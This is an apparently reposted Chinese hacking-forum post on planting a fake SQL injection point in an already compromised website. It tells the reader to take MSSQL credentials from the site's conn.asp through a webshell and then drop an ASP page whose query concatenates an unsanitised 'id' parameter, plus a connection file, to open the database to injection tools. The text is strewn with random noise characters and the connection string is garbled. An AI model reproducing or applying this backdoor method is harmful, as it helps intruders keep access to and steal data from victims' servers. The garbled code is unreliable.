自己构造注入点方便入侵
- k A1 K2 ~7 [" u: U" Z9 t+ A! ~4 H9 F/ A. b* d
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息4 J- X- w! ]% k7 N+ B& @ g9 p
# c3 ]' S2 ]3 H0 I1 F2 P这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
: m/ w* O8 Y8 |8 o" O( @% w2 o! {( N Z) |
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和+ K$ P+ W/ Z, K9 A$ e; Z; q
9 B, N0 @9 H- q
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
( l$ K" Q; }9 w0 c( N7 A. L) I: d
9 z" p' W/ q$ B% O2 j% ~3 U因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:: |1 l d }% x% ?# ~
% [9 f+ c% k4 e& K
程序代码+ k6 {% K" l6 ?- K% _
<!--#include file="xx.asp"-->
! J1 F) Z' Z- W9 [6 d<%! W7 G9 k. e& `9 K, ~
set rs=server.createobject("ADODB.recordset")
& z+ U f9 Y5 Z- ]2 q2 I0 _# cid = request("id"): W" C" [: o, Z" O) m
strSQL = "select * from admin where id=" & id
0 d y6 i3 L9 b1 Nrs.open strSQL,conn,1,3: `4 G& j, c8 A* C" N& t) Y
rs.close
/ c5 ^/ i" h/ o5 Y4 Z8 Q5 _! \%>
. d0 e# J, A% G5 ~
; e, c. W0 ]# Y把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
6 E8 _8 \/ s9 p9 R$ z) C$ p+ c& `5 ] ?
1 {( U: a& Z3 C- Y: S! p+ S你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!- U- ?: i! t& W
. ]! [* ^3 W( B* |/ D) L然后就要构造一个连接数据库的文件了,代码如下:6 [; q9 B4 I. F. ?8 }8 U" N6 `
程序代码
; q5 W* g( I6 o! @% \<%
3 t5 Q+ }) H! Q, h7 Q" M8 v# HstrSQLServerName = "000.000.000.000" '服务器名称或地址- \9 O8 m( ]1 {$ D8 g* i7 k; f$ N
strSQLDBUserName = "sqlname" '数据库帐号- @( B! Z% H% I j# Y5 N
strSQLDBPassword = "sqlpass" '数据库密码
$ R( | J( T; [strSQLDBName = "sqldataname" '数据库名称
7 n. c- h% h- }, USet conn = Server.CreateObject("ADODB.Connection"): l/ M. h0 A% F& F% a: p: s
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
: w: B+ g- h* M/ }$ _conn.open strCon0 i" t8 _( s3 G1 v4 o, B
%>
% P5 k! H: J x5 M7 [2 z8 L$ x- X) x# V2 k
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
1 U) @. E4 e3 Z( z2 E
. n+ w! X {2 t( c8 z9 C1 e就这样,正常情况下,就OK了,伪造成功……
* F, I: E- q' j" q4 f: f) X; }7 S$ j1 u
如果有什么问题可以提出来大家一起探讨解决。 |